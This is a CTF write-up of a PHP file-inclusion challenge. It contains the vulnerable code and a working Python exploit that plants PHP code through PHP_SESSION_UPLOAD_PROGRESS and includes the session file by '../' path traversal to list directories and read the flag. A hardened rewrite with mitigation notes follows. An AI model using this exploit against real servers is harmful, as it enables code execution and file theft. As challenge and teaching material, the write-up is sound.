The key to this challenge is also quite out-of-the-box; it feels like the national-competition (国赛) problems all expect you to scan directories for a pile of unconventional sensitive files.....
```php
<?php
highlight_file(__FILE__);
echo "your flag is in some file in /etc ";
$fielf = $_POST["field"];                       // assigned to $fielf, but $field is what gets used below
$cf = "/tmp/app_auth/cfile/" . $_POST['cf'];    // attacker-controlled suffix, no traversal check
if (file_exists($cf)) {
    include $cf;                                // includes whatever path 'cf' resolves to
    echo $$field;                               // variable variable: prints the variable whose name is in $field
    exit;
} else {
    echo "";
    exit;
}
?>
```
What is strange is that the `$fielf` variable that gets read in is never used; instead `$field` is used, which makes one suspect the challenge author made a typo orz. Support never replied afterwards either. Although we eventually ground it out, it still left a bad taste.

Then we found a file called you_can_seeeeeeee_me.php that gives phpinfo, and from it found session.save_path, which the challenge author had changed to irregular letters, with obvious signs of manual modification.
```python
import requests
import threading


def post():
    # PHP_SESSION_UPLOAD_PROGRESS makes PHP write the posted value into the session file;
    # 'cf' then traverses from /tmp/app_auth/cfile/ to that session file so it gets included.
    sessid = '2846ee569600018f0cf748bf66edd8dc'
    session = requests.session()
    while True:
        response = session.post(
            url='http://124.71.230.240:25934',
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': "<?php var_dump(scandir('/etc/ehcfcbcedi/ecebdbacbd/eaidcddbbi/edfgdffeaf/eeahaeffac/fl444444g'));?>",
                'cf': f'../../../../var/lib/php/sessions/figceadcfh/sess_{sessid}',
            },
            cookies={'PHPSESSID': sessid},
            files={"file": ('tmp.txt', '')},
        )
        # response = requests.post(url='http://124.71.230.240:25934', data=data, cookies=cookies)
        # print(response.text)
        if '..' in response.text:
            print(response.text)
            exit()


def flag():
    # Once the flag file's path is known, include it directly through the same traversal.
    url = 'http://124.71.230.240:25934'
    data = {'cf': '../../../../etc/ehcfcbcedi/ecebdbacbd/eaidcddbbi/edfgdffeaf/eeahaeffac/fl444444g'}
    response = requests.post(url=url, data=data)
    print(response.text)


flag()
# for i in range(128):
#     thread = threading.Thread(target=post)
#     thread.start()
```
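For comparison, here is a hardened version of the challenge's include logic, written as an added example for this writeup rather than code from the challenge author. It assumes the same two POST parameters (`cf` and `field`) and the same base directory `/tmp/app_auth/cfile/`; the `resolve_cfile()` helper and the `$allowed_fields` list are constructed for the example. It closes both holes the writeup relies on: `cf` is confined to the base directory with `realpath()` so the `../../../../var/lib/php/sessions/...` traversal into a session file is rejected, and the `$$field` variable variable is replaced by an allowlisted array lookup so `field` can no longer name an arbitrary variable.

```php
<?php
// Hardened rewrite of the challenge's include + echo logic (added example, not the original code).
// Assumption: the same base directory as the challenge.
const CFILE_BASE = '/tmp/app_auth/cfile';

// Returns the resolved path of a file inside CFILE_BASE, or null if the name is not acceptable.
function resolve_cfile(string $name): ?string
{
    // Only plain file names: no slashes, no NUL bytes, no traversal components.
    if ($name === '' || !preg_match('/\A[A-Za-z0-9_.-]+\z/', $name) || strpos($name, '..') !== false) {
        return null;
    }

    $base = realpath(CFILE_BASE);
    $real = realpath(CFILE_BASE . '/' . $name);
    // realpath() is false for missing files and follows symlinks, so the prefix check
    // also catches a symlink inside the base directory that points elsewhere.
    if ($base === false || $real === false || strpos($real, $base . '/') !== 0) {
        return null;
    }
    return $real;
}

// Constructed allowlist: the only keys a client may ask to display.
$allowed_fields = ['app_name', 'app_version'];

$cf = resolve_cfile((string)($_POST['cf'] ?? ''));
$field = (string)($_POST['field'] ?? '');

if ($cf === null || !in_array($field, $allowed_fields, true)) {
    http_response_code(400);
    exit;
}

// The config file is expected to `return [...]`; no variable variables are involved.
$config = include $cf;
if (!is_array($config)) {
    http_response_code(500);
    exit;
}
echo htmlspecialchars((string)($config[$field] ?? ''), ENT_QUOTES, 'UTF-8');
```

Two deployment notes go with this. First, path confinement only helps if the base directory is not writable by the web client; the writeup's trick works because PHP's own session directory is reachable and `PHP_SESSION_UPLOAD_PROGRESS` lets a client write into it, so setting `session.upload_progress.enabled = 0` (or keeping `session.save_path` outside any includable tree) removes that write primitive independently of the include fix. Second, the `$$field` construct is what turns a harmless-looking `echo` into a read of any variable in scope, and an explicit allowlist is the simplest way to remove that class of bug.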